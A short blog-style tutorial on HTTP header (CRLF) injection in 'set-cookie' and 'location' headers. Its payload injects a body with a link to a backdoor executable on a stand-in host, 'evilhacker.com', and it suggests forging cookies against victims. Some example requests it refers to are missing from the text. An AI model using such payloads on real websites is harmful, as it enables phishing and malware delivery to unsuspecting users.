HTTP header injection
If we can inject newline into the header we control , then we will be able to insert some additional HTTP Header and some nasty body text. I don’t think so that we can compromised a website/server via this vulnerability. But still it is power for Social Engineering attack, Phishing, Redirecting to malicious site, downloading backdoor, virtual defacement, sometime injecting cookie etc. It is much like XSS.
Basically this vulnerability found in “set-cookie” and “location” . If we connect to a website:
If this is behavior of the host then we should try to insert Carriage-return and Line-feed :
If the host is vulnerable then it will reply with a additional line “it-is=vulnerable” like this:
Simply a hacker can force the users to download a backdoor:
Content-Length:+22%0d%0a%0d%0a<html>%0d%0a<a href=www.evilhacker.com/backdoor.exe>Please update first</a>%0d%0a</html>%0d%0aHTTP/1.1
We can also create fake Cookie and send the url to the poor victim . Just think smartly and you will find some other way 😉